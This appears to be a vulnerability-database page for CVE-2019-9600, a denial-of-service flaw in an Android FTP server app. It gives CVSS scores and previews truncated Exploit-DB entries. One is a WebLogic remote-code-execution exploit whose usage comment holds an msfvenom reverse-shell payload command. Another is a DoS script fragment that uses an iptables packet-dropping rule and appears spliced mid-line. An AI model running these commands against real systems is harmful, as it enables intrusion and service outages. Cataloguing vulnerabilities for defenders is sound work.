CVE-2019-9600
published 2019-03-06
CVE-2019-9600: The Olive Tree FTP Server (aka com.theolivetree.ftpserver) application through 1.32 for Android allows remote attackers to cause a denial of service via a…
Priority P347 · high · 7.5 · CVSS 3.0
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EXPLOIT
EPSS: 8.30% (94.2th percentile)
The Olive Tree FTP Server (aka com.theolivetree.ftpserver) application through 1.32 for Android allows remote attackers to cause a denial of service via a client that makes many connection attempts and drops certain packets.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| theolivetree | ftp_server | <= 1.32 | — |
CVSS provenance
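| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |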
No detection rules found.
Exploit-DB
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
exploitdb·2019-04-30·CVSS 9.8
CVE-2019-2725 [CRITICAL] Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
---
```python
#!/usr/bin/python
# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725
# Date: 30/04/2019
# Exploit Author: Avinash Kumar Thapa
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0
# Tested on:
#OS: Windows 2012 R2 (Build 9600).
#Architecture : x64
#System Language : en_US
# CVE : CVE-2019-2725
# Script Usage:
# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1
# Add the powershell command in the variable
__author__ = "Avinash K
```
Exploit-DB
Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)
exploitdb·2019-03-12
---
```
# Exploit Title: Core FTP 2.0 build 653 - 'PBSZ' - Unauthenticated - Denial of Service (PoC)
# Date: 2019-03-12
# Exploit Author: Hodorsec ([email protected] / [email protected])
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://coreftp.com/server/download/archive/CoreFTPServer653.exe
# Version: Version 2.0, build 653, 32-bit
# Tested on: Windows 8.1 6.3 (build 9600)
# CVE: N/A
# Description:
# CoreFTP 2.0 is vulnerable to a DoS attack via the PBSZ command. Ironically, this command is being used for "Protection Buffer Size"
# and CoreFTP responds unauthenticated.
# The PBSZ command in CoreFTP only allows for a certain length of the string to be vulnerable to a DoS.
# This script triggers the DoS and fill
```
Exploit-DB
FTP Server 1.32 - Denial of Service
exploitdb·2019-02-28
CVE-2019-9600 FTP Server 1.32 - Denial of Service
---
```python
#!/usr/bin/env python
#coding: utf-8
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * FTP Server 1.32 Remote Denial of Service (DoS) *
# ************************************************************************
# Exploit Title: FTP Server 1.32 Remote Denial of Service (DoS)
# Date: 2019-02-26
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor: The Olive Tree
# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
# Category: Mobile Apps
# Version: \n"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
target_ip = socket.gethostbyname(target)
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( tar
```
No writeups or analysis indexed.
Published: 2019-03-06